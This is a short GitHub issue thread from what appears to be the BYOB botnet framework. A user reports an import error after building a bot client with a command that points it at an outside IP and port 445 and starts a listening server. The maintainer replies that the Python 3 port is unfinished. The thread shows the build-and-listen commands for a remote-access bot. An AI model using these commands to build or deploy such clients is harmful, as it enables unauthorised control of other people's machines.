### ISSUE TITLE
INFO:__main__:[-] 'requests.packages.urllib3' is not a package (HTTP Error 404: File not found)

### ISSUE THREAD

**Issue by Sti9mat3** [malwaredllc/byob#175]
hello guys,
i have try to create a client with this commande : 
     `python3.5 client.py --name testbot2.py --freeze 185.207.207.181 445`
and i listen on my vps with :
     `python3.5 server.py --port 445`
but the issue is when i back the client, i chmod him, start him and that is what he do

![image](https://user-images.githubusercontent.com/22038135/72467897-392ffb00-37dc-11ea-9330-5e4d33779211.png)

if anybody have an idea thanks to him !
sry for very apoximate english

**Comment by malwaredllc** [comment]
The port to Python3 is still incomplete. Try using Python2 for now and it should work.
